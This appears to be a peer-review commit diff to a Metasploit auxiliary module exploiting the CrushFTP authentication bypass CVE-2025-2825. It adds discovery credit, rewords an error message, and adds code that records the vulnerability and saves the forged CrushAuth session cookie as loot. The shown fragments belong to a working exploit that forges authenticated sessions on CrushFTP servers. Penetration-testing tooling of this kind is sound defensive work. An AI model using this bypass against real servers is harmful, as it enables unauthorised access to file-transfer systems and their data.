Implement suggested changes from peer review

Author: remmons-r7

modules/auxiliary/gather/crushftp_authbypass_cve_2025_2825.rb

@@ -19,7 +19,8 @@ def initialize(info = {})
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'remmons-r7', # MSF Module & Rapid7 Analysis
+          'Outpost24', # Initial Discovery
+          'remmons-r7' # MSF Module & Rapid7 Analysis
         ],
         'References' => [
           ['CVE', '2025-2825'],
@@ -50,7 +51,7 @@ def run
     print_status('Confirming the target is a CrushFTP web service')
     res_anonymous = get_anon_session
 
-    fail_with(Failure::Unknown, 'Connection failed - unable to get 404 page response') unless res_anonymous
+    fail_with(Failure::Unknown, 'Connection failed - unable to get web API response') unless res_anonymous
 
     # Confirm that the response returned a CrushAuth cookie and the status code was 404. If this is not the case, the target is probably not CrushFTP
     if (res_anonymous&.code != 404) || res_anonymous&.get_cookies !~ /CrushAuth=([^;]+;)/
@@ -80,7 +81,17 @@ def run
       fail_with(Failure::Unknown, 'Exploit failed - the target did not confirm authentication status')
     end
 
-    print_good("Authentication bypass succeeded! Cookie string generated\nCookie: CrushAuth=#{user_cookie}; currentAuth=#{user_cookie.to_s[-4..]}\n")
+    cookie_string = "Cookie: CrushAuth=#{user_cookie}; currentAuth=#{user_cookie.to_s[-4..]}"
+
+    print_good("Authentication bypass succeeded! Cookie string generated\n#{cookie_string}\n")
+
+    report_vuln(
+      host: rhost,
+      name: name,
+      refs: references
+    )
+
+    store_loot('CrushAuth', 'text/plain', datastore['RHOST'], cookie_string)
   end
 
   # A GET request to /WebInterface/ should return a 404 response that contains an 'anonymous' user cookie